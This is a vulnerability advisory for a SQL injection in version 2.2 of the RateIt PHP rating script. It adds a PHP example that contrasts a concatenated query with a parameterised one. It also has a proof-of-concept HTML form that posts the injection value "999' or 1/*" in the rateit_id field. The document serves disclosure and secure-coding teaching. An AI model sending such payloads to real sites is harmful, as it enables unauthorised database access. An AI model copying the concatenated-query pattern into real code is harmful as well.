SQL Injection Vulnerability in RateIt

Summary

Vulnerability: SQL Injection Vulnerability in RateIt
Discovered: 2006.04.14
Last Update: 2006.04.24 Exploitation code published
ID: EV0124
CVE: CVE-2006-1798
Risk Level: medium
Type: SQL Injection
Status: Unpatched. No reply from developer(s)
Vendor: n/a
Vulnerable Software: RateIt (http://www.absoft-my.com/)
Version: 2.2
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

A SQL injection vulnerability was found in the RateIt (http://www.absoft-my.com/) script.

Vulnerable script: rateit.php

The $rateit_id parameter is not properly sanitized before being used in a SQL query. This allows an attacker to run any SQL query by injecting arbitrary SQL code.

Condition: magic_quotes_gpc = off
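
Added example (not part of the original advisory and not RateIt's own code): the defect class described above, shown as a query built by string concatenation next to the same query with the value bound as a parameter, using the rateit_id value from the advisory's PoC form. The table name, column names, helper function names, the decimal id format and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example, not RateIt's code. Table and column names are assumptions,
// and an in-memory SQLite database stands in for the script's real one.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ratings (rateit_id TEXT PRIMARY KEY, votes INTEGER)");
$db->exec("INSERT INTO ratings VALUES ('1', 10), ('2', 20), ('3', 30)");

// Vulnerable pattern: the request value becomes part of the SQL text.
function count_concatenated(PDO $db, string $rateit_id): int
{
    $sql = "SELECT COUNT(*) FROM ratings WHERE rateit_id = '" . $rateit_id . "'";
    return (int) $db->query($sql)->fetchColumn();
}

// Hardened pattern: the value is bound as data and never parsed as SQL.
function count_bound(PDO $db, string $rateit_id): int
{
    $stmt = $db->prepare('SELECT COUNT(*) FROM ratings WHERE rateit_id = ?');
    $stmt->execute([$rateit_id]);
    return (int) $stmt->fetchColumn();
}

// Extra layer: reject anything that is not a plain decimal id (assumed format).
function is_valid_id(string $rateit_id): bool
{
    return ctype_digit($rateit_id);
}

$samples = ['2', "999' or 1/*"];   // a normal id, then the value from the PoC form
foreach ($samples as $id) {
    printf(
        "%-14s concatenated=%d bound=%d valid=%s\n",
        $id,
        count_concatenated($db, $id),
        count_bound($db, $id),
        is_valid_id($id) ? 'yes' : 'no'
    );
}
```

The magic_quotes_gpc setting was removed in PHP 5.4, so the condition above holds on every current PHP installation and the query itself has to be safe.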

PoC/Exploit

SQL Injection Example:

<form action="http://[host]/rate/index.php" method="post">
<input name="rate" value="x">
<input name="rateit_id" value="999' or 1/*">
<input name="hotscript_id" value="12345">
<input name="postedcounter" value="1">
<input name="action" value="doit">
<input type="submit" value="Rate!">
</form>

Solution

A solution for "SQL Injection Vulnerability in RateIt" is not available. Check the vendor's website for updates.